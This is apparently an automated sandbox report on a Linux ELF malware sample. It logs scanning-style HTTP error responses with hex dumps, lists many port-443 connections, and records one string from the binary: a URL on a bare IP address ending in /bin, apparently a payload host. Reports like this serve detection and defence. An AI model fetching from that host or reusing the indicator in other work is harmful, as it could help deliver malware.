              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlX-Frame-Options: SAMEORIGINContent-Length: 341Connection: closeDate: Fri, 22 Dec 2023 01:01:28 GMTServer: lighttpd/1.4.55Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 Not Found</title> </head> <body> <h1>404 Not Found</h1> </body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 16:01:40 GMTServer: ApacheContent-Length: 1797Keep-Alive: timeout=30, max=100Connection: Keep-AliveContent-Type: text/html; charset=UTF-8Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e e7 ae a1 e7 90 86 e3 83 84 e3 83 bc e3 83 ab 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 63 73 73 2f 62 61 73 65 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 70 3e 3c 69 6d 67 20 73 72 63 3d 22 2e 2f 74 6f 70 5f 6c 6f 67 6f 2e 70 68 70 22 20 77 69 64 74 68 3d 22 38 35 30 22 20 68 65 69 67 68 74 3d 22 36 30 22 3e 3c 2f 70 3e 0a 3c 64 69 76 20 69 64 3d 22 74 6f 70 4d 61 69 6e 22 3e 0a 0a 0a 3c 70 20 69 64 3d 22 6c 65 61 64 22 3e e3 81 94 e5 88 a9 e7 94 a8 e3 81 ab e3 81 aa e3 82 8b e7 ae a1 e7 90 86 e3 83 84 e3 83 bc e3 83 ab e3 82 92 e9 81 b8 e6 8a 9e e3 81 97 e3 80 81 e3 83 a6 e3 83 bc e3 82 b6 e3 83 bc e5 90 8d e3 81 a8 e3 83 91 e3 82 b9 e3 83 af e3 83 bc e3 83 89 e3 82 92 e3 81 94 e5 85 a5 e5 8a 9b e3 81 8f e3 81 a0 e3 81 95 e3 81 84 e3 80 82 3c 2f 70 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 68 65 61 64 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 63 34 37 2e 65 74 69 75 73 2e 6a 70 2f 53 69 74 65 5f 4d 61 6e 61 67 65 72 2f 3f 47 55 45 53 54 5f 49 50 3d 31 2e 33 33 2e 31 37 39 2e 32 32 32 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2e 2e 2f 69 6d 61 67 65 73 2f 46 76 73 47 65 32 66 53 4c 2f 2f 74 6f 70 5f 62 5f 73 6d 2e 67 69 66 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 e3 82 b5 e3 82 a4 e3 83 88 e3 83 9e e3 83 8d e3 83 bc e3 82 b8 e3 83 a3 e3 83 bc 22 3e 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 74 78 74 22 3e e3 82 b5 e3 82 a4 e3 83 88 e7 ae a1 e7 90 86 e8 80 85 28 61 64 6d 69 6e e3 82 a2 e3 82 ab e3 82 a6 e3 83 b3 e3 83 88 29 e7 94 a8 e3 81 ae e7 ae a1 e7 90 86 e3 83 84 e3 83 bc e3 83 ab e3 81 a7 e3 81 99 e3 80 82 3c 62 72 3e 0a e3 82 b5 e3 82 a4 e3 83 88 e7 ae a1 e7 90 86 e8 80 85 e3 81 ae e3 81 8a e5 ae a2 e3 81 95 e3 81 be e3 81 af e3 81 93 e3 81 a1 e3 82 89 e3 81 a7 e3 82 b5 e3 82 a4 e3 83 88 e5 85 a8 e4 bd 93 e3 81 ae e8 a8 ad e5 ae 9a e3 83 bb e3 82 a2 e3 82 ab e3 82 a6 e3 83 b3 e3 83 88 e7 ae a1 e7 90 86 e3 81 aa e3 81 a9 e3 82 92 e8 a1 8c e3 81 88 e3 81 be e3 81 99 e3 80 82 3c 62 72 3e 0a e3 82 b5 e3 82 a4 e3 83 88 e7 ae a1 e7 90 86 e8 80 85 28 61 64 6d 69 6e e3 82 a2 e3 82 ab e3 82 a6 e3 83 b3 e3 83 88 29 e3 81 ae e3 81 bf e3 83 ad e3 82 b0 e3 82 a4 e3 83 b3 e5 8f af e8 83 bd e3 81 a7 e3 81 99 e3 80 82 3c 2f 70 3e 0a 0a 3c 70 20 63 6c 61 73 73 3d 22 68 65 61 64 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 63 34 37 2e 65 74 69 75 73 2e 6a 70 2f 57 65 62 5f 4d 61 6e 61 67 6
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 16:01:40 GMTServer: ApacheContent-Length: 1797Keep-Alive: timeout=30, max=100Connection: Keep-AliveContent-Type: text/html; charset=UTF-8Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e e7 ae a1 e7 90 86 e3 83 84 e3 83 bc e3 83 ab 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 63 73 73 2f 62 61 73 65 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 70 3e 3c 69 6d 67 20 73 72 63 3d 22 2e 2f 74 6f 70 5f 6c 6f 67 6f 2e 70 68 70 22 20 77 69 64 74 68 3d 22 38 35 30 22 20 68 65 69 67 68 74 3d 22 36 30 22 3e 3c 2f 70 3e 0a 3c 64 69 76 20 69 64 3d 22 74 6f 70 4d 61 69 6e 22 3e 0a 0a 0a 3c 70 20 69 64 3d 22 6c 65 61 64 22 3e e3 81 94 e5 88 a9 e7 94 a8 e3 81 ab e3 81 aa e3 82 8b e7 ae a1 e7 90 86 e3 83 84 e3 83 bc e3 83 ab e3 82 92 e9 81 b8 e6 8a 9e e3 81 97 e3 80 81 e3 83 a6 e3 83 bc e3 82 b6 e3 83 bc e5 90 8d e3 81 a8 e3 83 91 e3 82 b9 e3 83 af e3 83 bc e3 83 89 e3 82 92 e3 81 94 e5 85 a5 e5 8a 9b e3 81 8f e3 81 a0 e3 81 95 e3 81 84 e3 80 82 3c 2f 70 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 68 65 61 64 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 63 34 37 2e 65 74 69 75 73 2e 6a 70 2f 53 69 74 65 5f 4d 61 6e 61 67 65 72 2f 3f 47 55 45 53 54 5f 49 50 3d 31 2e 33 33 2e 31 37 39 2e 32 32 32 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2e 2e 2f 69 6d 61 67 65 73 2f 46 76 73 47 65 32 66 53 4c 2f 2f 74 6f 70 5f 62 5f 73 6d 2e 67 69 66 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 e3 82 b5 e3 82 a4 e3 83 88 e3 83 9e e3 83 8d e3 83 bc e3 82 b8 e3 83 a3 e3 83 bc 22 3e 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 74 78 74 22 3e e3 82 b5 e3 82 a4 e3 83 88 e7 ae a1 e7 90 86 e8 80 85 28 61 64 6d 69 6e e3 82 a2 e3 82 ab e3 82 a6 e3 83 b3 e3 83 88 29 e7 94 a8 e3 81 ae e7 ae a1 e7 90 86 e3 83 84 e3 83 bc e3 83 ab e3 81 a7 e3 81 99 e3 80 82 3c 62 72 3e 0a e3 82 b5 e3 82 a4 e3 83 88 e7 ae a1 e7 90 86 e8 80 85 e3 81 ae e3 81 8a e5 ae a2 e3 81 95 e3 81 be e3 81 af e3 81 93 e3 81 a1 e3 82 89 e3 81 a7 e3 82 b5 e3 82 a4 e3 83 88 e5 85 a8 e4 bd 93 e3 81 ae e8 a8 ad e5 ae 9a e3 83 bb e3 82 a2 e3 82 ab e3 82 a6 e3 83 b3 e3 83 88 e7 ae a1 e7 90 86 e3 81 aa e3 81 a9 e3 82 92 e8 a1 8c e3 81 88 e3 81 be e3 81 99 e3 80 82 3c 62 72 3e 0a e3 82 b5 e3 82 a4 e3 83 88 e7 ae a1 e7 90 86 e8 80 85 28 61 64 6d 69 6e e3 82 a2 e3 82 ab e3 82 a6 e3 83 b3 e3 83 88 29 e3 81 ae e3 81 bf e3 83 ad e3 82 b0 e3 82 a4 e3 83 b3 e5 8f af e8 83 bd e3 81 a7 e3 81 99 e3 80 82 3c 2f 70 3e 0a 0a 3c 70 20 63 6c 61 73 73 3d 22 68 65 61 64 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 63 34 37 2e 65 74 69 75 73 2e 6a 70 2f 57 65 62 5f 4d 61 6e 61 67 6
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundVary: Accept-EncodingX-Frame-Options: SAMEORIGINContent-Type: text/htmlX-Content-Type-Options: nosniffDate: Fri, 22 Dec 2023 03:01:44 GMTCache-Control: no-cacheContent-Length: 223X-XSS-Protection: 1; mode=blockConnection: Keep-AliveAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 72 65 3e 3c 2f 70 72 65 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><head> <title>Not Found</title> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"></head><body><h2>Access Error: 404 -- Not Found</h2><pre></pre></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 16:01:57 GMTContent-Length: 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 16:01:57 GMTContent-Length: 0Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: HTTP/1.1 400 Bad RequestContent-Type: text/plain; charset=utf-8Connection: close400 Bad Request
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Thu, 21 Dec 2023 16:02:42 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
              Source: CuruFoiJiK.elfString found in binary or memory: http://45.142.182.103/bin
              Source: unknownNetwork traffic detected: HTTP traffic on port 39890 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 59024 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 40408 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50452 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49210 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 52874 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51548 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 39648 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50440 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 47270 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 37238 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 40650 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54802 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 34190 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 45088 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51524 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 41746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 36154 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60242 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 37214 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 37480 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 35274 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 57096 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 59036 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 35070 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 40662 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60278 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 52608 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 47016 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49222 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 37010 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53958 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 59494 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 45076 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 59290 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 32800 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 52416 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39500
              Source: unknownNetwork traffic detected: HTTP traffic on port 35262 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53934 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51512 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41812
              Source: unknownNetwork traffic detected: HTTP traffic on port 49426 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 59482 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50656 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41804
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41806
              Source: unknownNetwork traffic detected: HTTP traffic on port 52898 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 37034 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 40686 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 41722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 59216 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 37492 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 34394 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 36178 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 35250 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 59012 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 52428 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50644 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52516
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52514
              Source: unknownNetwork traffic detected: HTTP traffic on port 35478 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52518
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53840
              Source: unknownNetwork traffic detected: HTTP traffic on port 41914 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39540
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38212
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38214
              Source: unknownNetwork traffic detected: HTTP traffic on port 39468 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52510
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53842
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39546
              Source: unknownNetwork traffic detected: HTTP traffic on port 48558 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40526
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38206
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38208
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41856
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41858
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41852
              Source: unknownNetwork traffic detected: HTTP traffic on port 47090 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40520
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41850
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52528
              Source: unknownNetwork traffic detected: HTTP traffic on port 57276 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 37058 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53850
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39532
              Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38200
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38202
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53854
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53852
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40516
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41848
              Source: unknownNetwork traffic detected: HTTP traffic on port 53910 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40514
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41844
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40518
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41840
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41842
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40512
              Source: unknownNetwork traffic detected: HTTP traffic on port 44196 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52538
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51208
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53868
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51206
              Source: unknownNetwork traffic detected: HTTP traffic on port 58348 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52530
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53860
              Source: unknownNetwork traffic detected: HTTP traffic on port 47474 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53866
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52534
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39522
              Source: unknownNetwork traffic detected: HTTP traffic on port 56192 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53864
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52532
              Source: unknownNetwork traffic detected: HTTP traffic on port 40204 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41838
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40504
              Source: unknownNetwork traffic detected: HTTP traffic on port 59228 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39518
              Source: unknownNetwork traffic detected: HTTP traffic on port 48534 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40502
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41834
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40506
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41830
              Source: unknownNetwork traffic detected: HTTP traffic on port 38768 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41832
              Source: unknownNetwork traffic detected: HTTP traffic on port 53922 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51216
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53872
              Source: unknownNetwork traffic detected: HTTP traffic on port 58336 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53870
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53876
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52546
              Source: unknownNetwork traffic detected: HTTP traffic on port 52212 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41826
              Source: unknownNetwork traffic detected: HTTP traffic on port 40698 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39504
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53880
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41822
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39508
              Source: unknownNetwork traffic detected: HTTP traffic on port 57288 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 36780 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41820
              Source: unknownNetwork traffic detected: HTTP traffic on port 39456 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 40854 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51140 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38250
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38252
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53806
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39582
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38258
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39588
              Source: unknownNetwork traffic detected: HTTP traffic on port 46582 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40568
              Source: unknownNetwork traffic detected: HTTP traffic on port 33716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 47486 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40560
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53814
              Source: unknownNetwork traffic detected: HTTP traffic on port 48162 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41890
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53812
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53818
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39572
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39574
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38242
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39576
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39578
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38246
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53810
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38248
              Source: unknownNetwork traffic detected: HTTP traffic on port 35082 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40558
              Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 38396 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 39444 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40552
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40550
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41882
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40554
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53826
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53824
              Source: unknownNetwork traffic detected: HTTP traffic on port 51790 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53828
              Source: unknownNetwork traffic detected: HTTP traffic on port 36792 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39564
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38236
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39566
              Source: unknownNetwork traffic detected: HTTP traffic on port 49078 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 58312 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53820
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39568
              Source: unknownNetwork traffic detected: HTTP traffic on port 40842 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 39828 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41878
              Source: unknownNetwork traffic detected: HTTP traffic on port 45712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41874
              Source: unknownNetwork traffic detected: HTTP traffic on port 54826 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49606 -> 443
